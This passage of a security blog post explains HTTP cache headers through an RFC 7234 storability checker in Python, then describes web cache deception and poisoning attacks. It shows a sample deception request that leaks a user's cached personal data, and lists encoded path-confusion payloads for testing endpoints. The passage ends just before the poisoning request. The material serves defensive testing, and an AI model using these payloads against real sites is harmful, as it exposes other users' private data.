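<p>As an added example (not the post's or any vendor's code), the following Python function applies the storage rules of <i>RFC7234</i> sections 3 and 4.2 to a request/response pair, so that the headers produced by the servlet calls in the box above can be checked against what a shared cache (CDN or reverse proxy) is actually allowed to do with them. The sample headers, the handling of <i>Pragma</i> for HTTP/1.0 caches and the default-cacheable status set are assumptions of the example; <i>Vary</i>, validators and cache extensions are left out.</p>

```python
"""Shared-cache storability check after RFC 7234 sections 3 and 4.2.

Added example, not the blog post's or any vendor's code. For one
request/response pair it decides whether a shared cache may store the
response and whether it may reuse the copy without asking the origin.
Simplified on purpose: Vary, validators and cache extensions are ignored.
"""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import Dict, Optional

# Status codes a cache may store without explicit freshness information (RFC 7231 6.1).
DEFAULT_CACHEABLE_STATUS = {200, 203, 204, 206, 300, 301, 404, 405, 410, 414, 501}


def parse_cache_control(value: str) -> Dict[str, Optional[str]]:
    """'no-cache, max-age=0' -> {'no-cache': None, 'max-age': '0'} (names lower-cased)."""
    out: Dict[str, Optional[str]] = {}
    for part in value.split(","):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        out[name.strip().lower()] = arg.strip().strip('"') if arg else None
    return out


def _parse_date(value: str) -> Optional[datetime]:
    """HTTP-date -> aware UTC datetime, or None when unparsable."""
    try:
        dt = parsedate_to_datetime(value)
    except (TypeError, ValueError):
        return None
    if dt is None:
        return None
    return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc)


def freshness_lifetime(resp: Dict[str, str], cc: Dict[str, Optional[str]], now: datetime) -> Optional[int]:
    """Seconds of freshness per RFC 7234 4.2.1: s-maxage, then max-age, then Expires - Date.
    None means the origin gave no explicit expiration. An unparsable Expires
    (the RFC names the value "0" explicitly) counts as already expired."""
    for directive in ("s-maxage", "max-age"):
        val = cc.get(directive)
        if val is not None and val.isdigit():
            return int(val)
    if "expires" in resp:
        expires = _parse_date(resp["expires"])
        if expires is None:
            return 0
        date = _parse_date(resp["date"]) if "date" in resp else None
        return int((expires - (date or now)).total_seconds())
    return None


def shared_cache_verdict(request_headers: Dict[str, str], response_headers: Dict[str, str],
                         status: int = 200, now: Optional[datetime] = None) -> dict:
    """Return {'store': bool, 'reuse_without_revalidation': bool, 'reason': str}."""
    now = now or datetime.now(timezone.utc)
    req = {k.lower(): v for k, v in request_headers.items()}
    resp = {k.lower(): v for k, v in response_headers.items()}
    cc = parse_cache_control(resp.get("cache-control", ""))
    req_cc = parse_cache_control(req.get("cache-control", ""))

    # Assumption: an HTTP/1.0 cache seeing "Pragma: no-cache" on a response without
    # Cache-Control treats it like "Cache-Control: no-cache". RFC 7234 5.4 defines
    # Pragma for requests only; this mirrors the intent of the servlet snippet above.
    if "cache-control" not in resp and resp.get("pragma", "").strip().lower() == "no-cache":
        cc["no-cache"] = None

    def verdict(store: bool, reuse: bool, reason: str) -> dict:
        return {"store": store, "reuse_without_revalidation": reuse, "reason": reason}

    # RFC 7234 section 3: conditions under which a shared cache MUST NOT store.
    if "no-store" in cc or "no-store" in req_cc:
        return verdict(False, False, "no-store: must not be written to any cache")
    if "private" in cc:
        return verdict(False, False, "private: a shared cache must not store it")
    if "authorization" in req and not ({"public", "must-revalidate", "s-maxage"} & set(cc)):
        return verdict(False, False, "request carried Authorization and the response grants no explicit permission")
    lifetime = freshness_lifetime(resp, cc, now)
    if lifetime is None and "public" not in cc and status not in DEFAULT_CACHEABLE_STATUS:
        return verdict(False, False, f"status {status} is not cacheable by default and no freshness was given")

    # Storable. RFC 7234 sections 4 and 5.2.2: may the copy be reused without revalidating?
    if "no-cache" in cc:
        return verdict(True, False, "no-cache: stored, but every reuse must be validated with the origin")
    if lifetime is None:
        return verdict(True, True, "no explicit expiration: the cache may assign heuristic freshness (4.2.2)")
    if lifetime <= 0:
        return verdict(True, False, "already stale: cannot be served without validation")
    return verdict(True, True, f"fresh for {lifetime}s, reused without contacting the origin")


# Constructed inputs. SERVLET_RESPONSE is what the servlet calls in the box above emit.
SERVLET_RESPONSE = {
    "Date": "Mon, 01 Jan 2024 10:00:00 GMT",
    "Expires": "Thu, 01 Jan 1970 00:00:00 GMT",  # setDateHeader("Expires", 0)
    "Pragma": "no-cache",
    "Cache-Control": "no-cache,must-revalidate, proxy-revalidate",
    "Content-Type": "application/json",
}
UNPROTECTED_API = {"Content-Type": "application/json"}  # 200 response that says nothing about caching
STRICT_RESPONSE = {"Cache-Control": "no-store"}

if __name__ == "__main__":
    for name, headers in (("servlet", SERVLET_RESPONSE), ("unprotected", UNPROTECTED_API), ("strict", STRICT_RESPONSE)):
        print(name, shared_cache_verdict({}, headers))
```

<p>The verdict for the servlet headers is the instructive one: <i>no-cache</i> and <i>must-revalidate</i> still let a shared cache store the response, as long as it revalidates with the origin before every reuse, while <i>no-store</i> is the only directive that forbids writing it at all. For responses carrying sensitive data, add <i>no-store</i> alongside the directives shown in the box; and note that a plain 200 with no caching headers at all may be stored and served under heuristic freshness.</p>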
<p></p>
<br />
<h3>Web Cache Exploitability</h3>
<p>The web-cache headers might sometimes be part of the problem behind web cache security <i>issues</i>.<br />
For example, an attacker might abuse a requested path to create a <b>type confusion flaw </b>within a misconfigured server-side web cache storage, leading, for instance, to <b>user data exfiltration</b>; this can happen even if the cache-related response headers are properly configured.<br /><br />
As shown in the following table, a web infrastructure can be composed of multiple gateway layers. Each of these layers drives the web cache server according to its own rules.
<br /><br />
These usually are: </p><span id="docs-internal-guid-2dc0e82f-7fff-47df-318b-e1e34a9a57e5"><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="200"></col><col width="400"></col></colgroup><tbody><tr style="height: 21pt;"><td rowspan="5" style="background-color: #cfe2f3; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="background-color: transparent; color: #0b5394; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #0b5394; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">TOP</span><span style="background-color: transparent; color: #0b5394; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #0b5394; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="background-color: transparent; color: #0b5394; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Architecture Gateways</span></p><br /><br /><br /><br /><br /><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: 
center;"><span style="background-color: transparent; color: #990000; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">LOW</span><span style="background-color: transparent; color: #990000; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #990000; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="background-color: transparent; color: #990000; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Architecture Gateways</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">DNS</span></p></td></tr><tr style="height: 21pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #274e13; font-family: Arial; font-size: 10pt; 
font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Load Balancer</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">AWS</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">)</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">CDN</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Cloudflare, Akamai, Amazon CloudFront</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">)</span><span style="color: #274e13; font-family: 
Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Reverse Proxy</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Haproxy, AWS, Caddy</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) </span></p></td></tr><tr style="height: 21pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">CMS</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">OPENCMS, AEM, 
DRUPAL</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">)</span></p></td></tr><tr style="height: 21pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Application Server</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">JBOSS, JETTY</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">)</span></p></td></tr><tr style="height: 21pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; 
white-space: pre-wrap;">Web Server</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">NGINX, TOMCAT, APACHE</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">)</span></p></td></tr></tbody></table></div></span><p>
<br />When different gateways enable <b>conflicting caching rules</b>, the web cache server may prioritize one of the gateways for certain cases. Specifically, this happens when the same web page would be cached by one gateway but not by another one. <br />In these cases, <b><u>a secure configuration of the gateways that are not prioritized is completely useless for the purpose of preventing web caching attacks</u></b>. <br /><br />
To prevent them, it is necessary to ensure that all the active caching mechanisms are properly configured, considering also edge cases in which different mechanisms result in conflicts about what to cache.
<br /><br />
For instance, while performing a security assessment for one of our clients, we encountered a web infrastructure in which the <i>Content Management System (CMS)</i> and the web cache server itself had different rules for detecting and caching static files. <br />
The <i>CMS</i> <u>identified</u> static files based on the URL only, so it could be fooled into treating an API response as an image.
<br />The <i>web cache</i> server <u>did not identify</u> that kind of response as an image, so it set the correct caching headers, intended to keep the response out of the cache. <br /><br />
In summary, the flaw arose because the <i>CMS</i> rules took priority over the web cache server’s, leading to a <b>Web Cache Deception Vulnerability</b> (described in depth below).
<br /><br />
The previous scenario is known as <b><i>path confusing web cache</i></b>; in such cases, attention must be paid to the “<b><i>vertical order</i></b>” of the components and layers involved in the communication between the two endpoints. <br /><br />
The purpose and the behaviour of the different cache copies held by the components listed in the table, as discussed at the beginning of this article, are mostly the same. The differences lie in the <b>physical and logical position</b> of these copies within the architecture of the communication path, and in the <b>internal configuration</b> of each component.
</p>
<br />
<h3>Web Cache Attacks</h3>
<p>Beyond the issue of different overlapping web cache configurations, the main impact of a web cache attack is to <i>store a web page with unexpected content</i>. In other words, caching ordinary web pages containing <b>malicious content</b> or <b>users’ sensitive information</b>.<br />
In summary, an insecure cache management could allow the following attacks:
</p><ul>
<li><b>Web Cache Deception</b>, where the attacker forces the victim to cache their sensitive data;</li>
<li><b>Web Cache Poisoning</b>, where the attacker poisons a web page and induces the victim to visit it.</li>
</ul>
<br />Overall, these attacks might result in the possibility of exploiting the following scenarios:
<ul>
<li><b><i>Phishing</i></b></li><li><b><i>HTML Injection</i></b></li><li><b><i>Cross-Site Scripting</i></b></li><li><b><i>Open Redirect</i></b></li><li><b><i>Secrets Disclosure</i></b></li>
</ul>
<p></p>
<br />
<h3>Web Cache Deception Attack</h3>
<p>So far so good, but how can a “<b>Web Cache Deception Attack</b>” (<i>WCD</i>) be performed in order to verify whether your web application is vulnerable?
<br /><br />
A WCD attack consists of forcing the web server to store the victim’s data in a <b>public cache</b> and then accessing it. The fun part is that this is one of those rare cases in which it is easier done than said.
<br />This attack was first documented by Omer Gil in <a href="https://omergil.blogspot.com/2017/02/web-cache-deception-attack.html" target="_blank">2017</a> and <a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack.pdf" target="_blank">presented</a> at Black Hat in the same year.
<br /><br />
Let’s consider a web application that provides an API to retrieve the user’s personal data at the endpoint ‘<i>/my-account/getData.json</i>’. <br />
In a standard configuration, the server would cache web pages based on the response headers. Instead, the application relies on a CMS whose configuration caches web pages based on the file extension, disregarding the headers. For this reason, since this API call returns JSON data, its response does not get cached.
<br /><br />
What if the user calls ‘<i>/my-account/getData.json/<b>test.css</b></i>’? The application processes the request to ‘/getData.json’ and then the CMS caches the response, since it detected a static file extension.
<br /><br />
Request:
<b id="docs-internal-guid-6a1ef538-7fff-687d-b1f0-dd711cbcbadc" style="font-weight: normal;"><br /></b></p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GET /my-account/getData.json/test</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.css</span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> HTTP/1.1</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Host: www.vulndomain.com</span></p></td></tr></tbody></table></div><p><br /> Response: </p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 
451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">HTTP/1.1 200 OK</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Cache-Control: max-age=0, no-cache, no-store</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">{"companyName":"Acme Corp.","userName":"admin","firstName":"Mario",</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">"lastName":"Rossi","email":"mario@acme.com","telephone":"+39 3333333333"}</span></p></td></tr></tbody></table></div><p><br /> It can be noted that the “Cache-Control” header in the response should prevent the server from caching the 
page, but it still gets stored in a public cache. This is due to the CMS treating the response as a public static file.
<br />Thus, anyone who has access to the same web cache as that user will be able to retrieve the same content by requesting ‘<i>/my-account/getData.json/test.css</i>’.
<br />That happens because the subsequent request does not reach the central server (which processes API calls), but stops at a closer edge server, which returns the cached response.
<br /><br />
In other words, to exploit this vulnerability an attacker sends the victim a crafted URL which forces the CMS to publicly cache sensitive data once the victim visits it. The attacker then requests the same URL and receives, in the response body, the victim’s sensitive information wrongly stored because of the cache flaw.
<br /><br />
Similarly, if the web server is configured not to cache any request under the directory "<i>/getData.json</i>" and an administrator later adds a rule in the reverse proxy to cache JPEG files, an attacker could perform a <b><i>Web Cache Deception</i></b> attack by confusing the requested path (i.e. requesting the resource "<i>/getData.json/..;/a.jpg</i>").
<br /><br />
You should also verify the following payloads (which may fool one of the caching components of your infrastructure) to ensure that your endpoints are properly secured against Web Cache Deception Attacks: <b id="docs-internal-guid-389bdee2-7fff-7ef1-00e1-f9598888b469" style="font-weight: normal;"><br /></b></p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># Encoded Newline (\n)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">example.com/account.php</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">%0A</span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">nonexistent.css </span><span 
style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># Encoded Semicolon (;)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: 
normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">example.com/account.php</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">%3B</span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">nonexistent.css</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># Encoded Pound (#)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">example.com/account.php</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">%23</span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">nonexistent.css</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; 
font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># Encoded Question Mark (?)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">example.com/account.php</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">%3F</span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">name=valnonexistent.css</span></p></td></tr></tbody></table></div><p><br /> Reference: “<a href="https://arxiv.org/pdf/1912.10190.pdf" target="_blank">Cached and Confused: Web Cache Deception in the Wild</a>”.
</p>
<br />
<h3>Web Cache Poisoning Attack</h3>
<p>On the other hand, the objective of a “<b>Web Cache Poisoning Attack</b>” is to <b>add malicious code</b> to a vulnerable web page and <b>aim the attack</b> at a specific victim, since the attacker knows the exact cache keys under which the malicious web page is <b>stored</b>.
<br /><br />
This attack was first documented by James Kettle in 2018 and <a href="https://www.blackhat.com/us-18/briefings/schedule/#practical-web-cache-poisoning-redefining-unexploitable-10200" target="_blank">presented</a> at Black Hat in the same year.
<br /><br />
In this scenario, the targeted web page is identified by a specific “<i>cache key</i>”, for instance a <b>nonexistent URL parameter value</b> on a given path: the attacker-controlled web page will be cached under that specific parameter value.<br />
Moreover, whereas the “<i>Web Cache Deception</i>” scenario requires finding a vulnerable file extension, this attack requires a request header that is reflected in the web page but is not used as a key by the caching server. <br /><br />
For instance, suppose that a malicious user discovers, through the Burp Suite extension “<a href="https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943" target="_blank">Param Miner</a>”, the hidden “<b>X-Origin-URL</b>” header, which is <b>reflected</b> in the response page and is <b>not used as a cache key</b>. This header is an entry point for a <b>Cross-Site Scripting</b> vulnerability, as shown in the following request.
<br /><br />
Request:
